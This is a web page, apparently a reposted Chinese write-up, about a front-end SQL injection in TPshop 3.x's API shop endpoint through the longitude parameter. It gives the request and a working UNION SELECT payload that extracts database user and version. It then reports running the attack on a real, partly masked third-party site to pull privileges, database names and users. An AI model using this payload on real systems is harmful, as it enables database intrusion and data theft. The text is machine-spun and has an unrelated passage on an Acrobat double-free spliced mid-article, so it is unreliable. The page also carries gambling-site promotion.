某shop API接口前台注入(通杀3.X) | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

某shop API接口前台注入(通杀3.X)

申博_安全防护 申博 215次浏览 未收录 0个评论

0x01 媒介

TPshop是国内运用局限大、掩盖面广的电商软件产品,基于此,历经5年的时候,而生长成为国内先进的具有成熟且标准化的电商平台手艺解决方案提供商。“TPshop” 的每一次新产品宣布都引带头中国电商软件研发范畴的潮水,延续为中国电子商务服务行业。同时公司建立了由多名科学家组成的行业及手艺研究中心,对电商行业生长趋势、软件产品架构、手艺性、新手艺运用与立异等都做出了卓越贡献。

代码泉源:

http://www.tp-shop.cn/download/

0x02 剖析

跟踪到/application/home/controller/Api.php控制器中的shop要领:

某shop API接口前台注入(通杀3.X)

流程剖析:

379~384 Line: 猎取外部输入并赋值给变量
385~387 Line: $province_id、$province_id、$district_id推断以上三个遍历是不是为空,若建立返回空的json
388 Line: 将$province_id、$city_id、$district_id放入$where数组中以供SQL查询
389 Line: 界说变量$field并赋值为*
390 Line: 界说变量$order并赋值为shop_id desc
391 Line: 推断变量$longitude是不是为真
392 Line: 将$longitude、$latitude拼接到SQL语句中并赋值到$field中
393 Line: 将$order赋值为distance ASC
395 Line: 推断$shop_address是不是为真
396 Line: 将$shop_address放入$where数组中以供SQL查询
399 Line: 带入SQL查询

代码调试:

经由过程代码剖析后发明$field传入要领field中,其实不会将这个变量中的值预编译,而是直接带入中实行,接着来调试!在399行后增加代码以下:

print Db::name('region')->getlastsql();

getlastsql要领在tp框架中是返回SQL语句也能够说是监听,接着往下走,接见

http://localhost:8083/index.php/home/api/shop

POST包:

province_id=1&city_id=2&district_id=1&shop_address=aaaa&latitude=1&longitude=1

某shop API接口前台注入(通杀3.X)

longitude参数赋值为1’

某shop API接口前台注入(通杀3.X)

能够看到顺序已抛出了非常,MySQL实行毛病,终究Payload以下:

PDF两重开释破绽CVE-2018-4990剖析

漏洞概述 CVE-2018-4990是Adobe在2018年5月修复的一个Adobe DC系列PDF阅读器的0day漏洞。该漏洞为双重释放(Double Free)漏洞,攻击者通过一个特殊的JPEG2000图像而触发Acrobat Reader双重释放,再通过JavaScript对于ArrayBuffers灵活的控制来实现任意地址读写。 攻击者可以通过这个漏洞实现对任意两个4字节地址的释放,漏洞触发前用精准的堆喷射巧妙地布局内存,然后触发漏洞,释放可控的的两块大小为0xfff8的相邻堆块。随后,Windows堆分配算法自动将两块空闲的堆块合并成一个大堆块,接着立即重新使用这个大堆块,并利用这个该堆块的读写能力改写一个ArrayBuffer对象的长度为0x66666666,从而实现任意地址读写。 漏洞细节 代码分析 分析漏洞样本,通过PDF流解析工具PdfStreamDumper可以看到pdf文件里面的objects流。其中第1个object流使用了JavaScript来触发并利用漏洞。通过对该段分析可以知道,JavaScript中的dlldata为PDF阅读器漏洞触发后加载运行的载荷,主要用于提权并执行恶意代码,而之后的JavaScript代码用来进行内存布局和漏洞触发。上面JavaScript代码中通过两个Array实例sprayarr及a1来进行内存控制,这两个Array在这里构造了大量对象,申请了大量的堆空间来实

province_id=1&city_id=2&district_id=1&shop_address=aaaa&latitude=1&longitude=1- latitude)* 111),2))),2) AS distance FROM `tp_shop` WHERE `deleted` = :where_deleted AND `shop_status` = :where_shop_status AND `province_id` = :where_province_id AND `city_id` = :where_city_id AND `district_id` = :where_district_id AND ( `shop_name` LIKE :where_shop_name OR `shop_address` LIKE :where_shop_address ) UNION(SELECT(user()),(version()),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29))%23

(实战中需依据字段数调解一下Payload)

某shop API接口前台注入(通杀3.X)

破绽复现:

示例站:http://www.e******.com/index.php/home/api/shop
字段数:28

查权限:

某shop API接口前台注入(通杀3.X)

查库名:

某shop API接口前台注入(通杀3.X)

查字段:

某shop API接口前台注入(通杀3.X)

查用户:

某shop API接口前台注入(通杀3.X)

(复现泉源于互联网,若有打码不严还请手下留情。)

0x03 总结

贵州白马会头牌提醒您,代码千万行,平安第一条,开辟(PDO)不范例,体系被插惨。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明某shop API接口前台注入(通杀3.X)
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址